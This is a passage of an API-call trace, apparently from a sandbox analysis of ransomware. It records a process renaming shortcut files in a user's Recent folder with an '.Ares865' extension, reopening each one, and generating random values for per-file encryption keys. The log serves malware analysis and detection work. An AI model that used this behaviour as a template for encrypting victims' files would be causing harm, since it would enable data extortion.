halpmcxz\\recent\\rr5oj-4e-.lnk.ares865"), dwFlags=0x1) returned 1 [0093.560] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Rr5oj-4E-.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\rr5oj-4e-.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.561] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2604) returned 1 [0093.561] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.562] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.562] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.562] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.563] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.563] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.564] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\S66RdXEYILoQusWLL.lnk.Ares865") returned 66 [0093.564] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\S66RdXEYILoQusWLL.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\s66rdxeyiloquswll.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\S66RdXEYILoQusWLL.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\s66rdxeyiloquswll.lnk.ares865"), dwFlags=0x1) returned 1 [0093.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\S66RdXEYILoQusWLL.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\s66rdxeyiloquswll.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.565] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3906) returned 1 [0093.565] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.566] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.566] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.567] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.568] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.568] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.569] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\S7p6.lnk.Ares865") returned 53 [0093.569] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\S7p6.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\s7p6.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\S7p6.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\s7p6.lnk.ares865"), dwFlags=0x1) returned 1 [0093.570] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\S7p6.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\s7p6.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.570] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2545) returned 1 [0093.571] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.571] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.571] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.571] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.572] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.572] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.574] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\smiBSZIQEhs96nxaE7e.lnk.Ares865") returned 68 [0093.574] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\smiBSZIQEhs96nxaE7e.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\smibsziqehs96nxae7e.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\smiBSZIQEhs96nxaE7e.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\smibsziqehs96nxae7e.lnk.ares865"), dwFlags=0x1) returned 1 [0093.575] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\smiBSZIQEhs96nxaE7e.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\smibsziqehs96nxae7e.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.575] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8504) returned 1 [0093.575] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.576] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.576] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.577] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.577] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.577] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.579] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\SYJm5ty_9Yg3ouLbVrXO.lnk.Ares865") returned 69 [0093.579] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\SYJm5ty_9Yg3ouLbVrXO.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\syjm5ty_9yg3oulbvrxo.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\SYJm5ty_9Yg3ouLbVrXO.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\syjm5ty_9yg3oulbvrxo.lnk.ares865"), dwFlags=0x1) returned 1 [0093.580] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\SYJm5ty_9Yg3ouLbVrXO.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\syjm5ty_9yg3oulbvrxo.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.580] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4866) returned 1 [0093.580] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.581] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.581] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.581] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.582] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.582] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.583] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\SZHVDrg1aa85o.lnk.Ares865") returned 62 [0093.583] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\SZHVDrg1aa85o.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\szhvdrg1aa85o.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\SZHVDrg1aa85o.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\szhvdrg1aa85o.lnk.ares865"), dwFlags=0x1) returned 1 [0093.584] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\SZHVDrg1aa85o.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\szhvdrg1aa85o.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.585] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5122) returned 1 [0093.585] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.586] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.586] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.586] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.587] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.587] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.588] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\T8vx.lnk.Ares865") returned 53 [0093.588] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\T8vx.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\t8vx.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\T8vx.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\t8vx.lnk.ares865"), dwFlags=0x1) returned 1 [0093.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\T8vx.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\t8vx.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.589] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3752) returned 1 [0093.590] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.590] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.590] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.591] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.592] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.592] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.593] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\TjQW0YLCXKbuJsXnXkp4.lnk.Ares865") returned 69 [0093.593] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\TjQW0YLCXKbuJsXnXkp4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\tjqw0ylcxkbujsxnxkp4.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\TjQW0YLCXKbuJsXnXkp4.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\tjqw0ylcxkbujsxnxkp4.lnk.ares865"), dwFlags=0x1) returned 1 [0093.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\TjQW0YLCXKbuJsXnXkp4.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\tjqw0ylcxkbujsxnxkp4.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.595] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1065) returned 1 [0093.595] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.595] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.596] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.597] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.597] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.597] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.599] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Tpue5B2Zg9wl.lnk.Ares865") returned 61 [0093.599] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Tpue5B2Zg9wl.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\tpue5b2zg9wl.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Tpue5B2Zg9wl.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\tpue5b2zg9wl.lnk.ares865"), dwFlags=0x1) returned 1 [0093.600] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Tpue5B2Zg9wl.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\tpue5b2zg9wl.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.600] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3851) returned 1 [0093.600] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.601] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.601] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.602] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.602] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.602] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.604] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\TUhfjYAIMEhE_9FnZNyx.lnk.Ares865") returned 69 [0093.604] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\TUhfjYAIMEhE_9FnZNyx.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\tuhfjyaimehe_9fnznyx.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\TUhfjYAIMEhE_9FnZNyx.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\tuhfjyaimehe_9fnznyx.lnk.ares865"), dwFlags=0x1) returned 1 [0093.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\TUhfjYAIMEhE_9FnZNyx.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\tuhfjyaimehe_9fnznyx.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.605] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=529) returned 1 [0093.605] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.606] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.606] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.607] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.608] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.608] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.609] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\tXP_OoQPU-g4.lnk.Ares865") returned 61 [0093.609] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\tXP_OoQPU-g4.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\txp_ooqpu-g4.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\tXP_OoQPU-g4.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\txp_ooqpu-g4.lnk.ares865"), dwFlags=0x1) returned 1 [0093.610] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\tXP_OoQPU-g4.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\txp_ooqpu-g4.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.610] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3806) returned 1 [0093.611] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.611] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.611] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.612] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.613] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.613] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.614] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\U-4Pr.lnk.Ares865") returned 54 [0093.614] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\U-4Pr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\u-4pr.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\U-4Pr.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\u-4pr.lnk.ares865"), dwFlags=0x1) returned 1 [0093.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\U-4Pr.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\u-4pr.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.615] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=737) returned 1 [0093.616] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.616] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.616] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.617] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.617] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.617] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.619] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Uh-p4OWxt2bQ4b48QJIt.ots.lnk.Ares865") returned 73 [0093.619] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Uh-p4OWxt2bQ4b48QJIt.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\uh-p4owxt2bq4b48qjit.ots.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Uh-p4OWxt2bQ4b48QJIt.ots.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\uh-p4owxt2bq4b48qjit.ots.lnk.ares865"), dwFlags=0x1) returned 1 [0093.620] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\Uh-p4OWxt2bQ4b48QJIt.ots.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\uh-p4owxt2bq4b48qjit.ots.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.620] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3899) returned 1 [0093.620] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.621] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.621] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.622] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.622] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.622] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.624] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\UrVEZB.lnk.Ares865") returned 55 [0093.624] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\UrVEZB.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\urvezb.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\UrVEZB.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\urvezb.lnk.ares865"), dwFlags=0x1) returned 1 [0093.638] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\UrVEZB.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\urvezb.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.638] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2427) returned 1 [0093.639] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.639] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.639] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.640] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.640] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.640] CryptReleaseContext 